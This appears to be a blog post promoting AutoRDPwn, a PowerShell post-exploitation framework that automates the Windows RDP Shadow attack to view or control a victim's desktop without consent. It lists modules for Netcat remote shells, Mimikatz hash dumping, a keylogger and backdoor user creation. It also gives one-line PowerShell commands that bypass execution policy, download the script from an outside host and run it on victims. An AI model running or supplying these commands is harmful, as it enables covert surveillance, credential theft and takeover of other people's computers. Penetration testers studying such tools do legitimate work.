AutoRDPwn : The Shadow Attack Framework

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers.

This vulnerability (cataloged as a feature by Microsoft) allows a remote attacker to view their victim’s desktop without their consent, and even control it on demand, using tools native to the operating system itself.

Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump the system hashes with Mimikatz, load a remote keylogger and much more. All this, through a fully intuitive menu in seven different languages.

Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements

Powershell 4.0 o superior

Changes

  • Version 5.1
    • Many bugs fixed
    • Aesthetic improvements and improved waiting times
    • Proxy-Aware connection through system settings
    • It is now possible to use the offline tool by downloading the .zip file
    • Language auto-detection by pressing the enter key
    • Invoke-DCOM has been replaced by SharpRDP
    • PowerUp has been replaced by Invoke-PrivescCheck
    • Creation of the automatic cleaning subroutine in the victim
    • New module available: SMB Shell encrypted with AES
    • New module available: Change user with RunAs
    • The rest of the changes can be consulted in the CHANGELOG file

Use

This application can be used locally, remotely or to pivot between teams.
When used remotely in a reverse shell, it is necessary to use the following parameters:

ParameterDescription
-admin / -noadminDepending on the permissions we have, we will use one or the other
-noguiThis will avoid loading the menu and some colors, guaranteed its functionality
-langWe will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-optionAs with the menu, we can choose how to launch the attack
-shadowWe will decide if we want to see or control the remote device
-createuserThis parameter is optional, the user AutoRDPwn:AutoRDPwn will be created on the victim machine
-nocleanDisables the process of undoing all changes on the victim computer

Local execution on one line:

powershell -ep bypass “cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1”

Example of remote execution on a line:

powershell -ep bypass “cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser”

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Also Read – URLBrute : Tool To Brute Website Sub-Domains & Dirs

Screenshots

AutoRDPwn : The Shadow Attack Framework

License

This project is licensed under the GNU 3.0 license – see the LICENSE file for more details.

Credits and Acknowledgments

This framework uses the following scripts and tools:
• Chachi-Enumerator by Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Invoke-Phant0m by Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp by Nikhil “SamratAshok” Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz by Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec by Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper by Stas’M Corp. -> https://github.com/stascorp/rdpwrap
• SharpRDP by Steven F -> https://github.com/0xthirteen/SharpRDP
And many more, that do not fit here.. Thanks to all of them and their excellent work.